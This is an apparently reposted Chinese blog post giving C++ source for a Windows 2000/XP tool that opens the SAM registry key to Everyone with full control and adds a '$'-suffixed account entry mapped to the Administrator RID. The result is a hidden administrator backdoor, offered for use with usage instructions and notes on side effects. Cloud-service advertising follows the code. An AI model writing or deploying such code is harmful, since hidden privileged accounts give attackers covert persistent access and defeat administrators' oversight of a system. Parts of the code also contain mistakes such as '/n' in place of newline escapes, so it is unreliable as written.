所以把這個[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/A$]
@=hex(1f4):
對2000和xp有效,但是重啟之後,進入管理工具中無法開啟使用者一攔
xp中啟動截面只能夠用經典的登陸,即輸入兩次ctrl+alt+del才可以!
代碼是參考網上的,很簡單,只是增加了以上的註冊表健值!
xp+vs.net 2003編譯通過
// creatadmin.cpp : 定義控制台應用程式的進入點。
//
#include "stdafx.h"
#include <Windows.h>
#include <Aclapi.h>
/* 在註冊表sam鍵下面的SAM//SAM//Domains//Account//Users//Names新加一個帶"$"的使用者就可以實現隱藏;在2000,xp下測試
問題:2000下重啟後在電腦管理工具中的本機使用者和組將無法再顯示
xp的啟動介面只能夠由經典的登陸模式,即雙擊ctrl+alt+del登陸!!!*/
void _tmain(int argc, _TCHAR* argv[])
{
std::string sam = "SAM//SAM//Domains//Account//Users//Names";
if (argc != 2)
{
printf("Welcome to Http://systest2005.52blog.net/nmail to:systest2005@126.com!");
printf("/nYou must input the name of administrators you want to create!");
printf("/nUsage:%s name",argv[0] );
printf("/n<name> must end with $");
exit(0);
}
int n = strlen(argv[1]);
if (argv[1][n-1] != '$')
{
printf("The name must end with $");
exit(0);
}
char *s = argv[1];
/*以下代碼為網上搜尋而來,我也不知道最先的出處*/
DWORD dwRet;
LPSTR SamName = "MACHINE//SAM//SAM";
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
HKEY mkey = NULL;
// 擷取SAM主鍵的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
printf("GetNamedSecurityInfo Error: %d/n", dwRet);
goto FreeAndExit;
}
// 建立一個ACE,允許Everyone完全控制對象,並允許子物件繼承此許可權
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, "Everyone", KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// 將新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl Error: %d/n", dwRet);
goto FreeAndExit;
}
// 更新SAM主鍵的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
printf("SetNamedSecurityInfo Error: %d/n", dwRet);
goto FreeAndExit;
}
// 開啟SAM的子鍵
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SAM//SAM//Domains//Account//Users//names//",
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg Open Key Error: %d/n", dwRet);
goto FreeAndExit;
}
dwRet = RegCreateKey(hKey,s,&mkey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg CreatKey Error: %d/n", dwRet);
goto FreeAndExit;
}
dwRet = RegSetValueEx(mkey,NULL,NULL,0x1f4,NULL,0);
if (dwRet != ERROR_SUCCESS)
{
printf("set Key value Error: %d/n", dwRet);
goto FreeAndExit;
}
printf("create SAM Subkey Successfully./n");
RegCloseKey(hKey);
RegCloseKey(mkey);
FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 還原SAM主鍵的DACL
if (pOldDacl) SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return ;
}
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
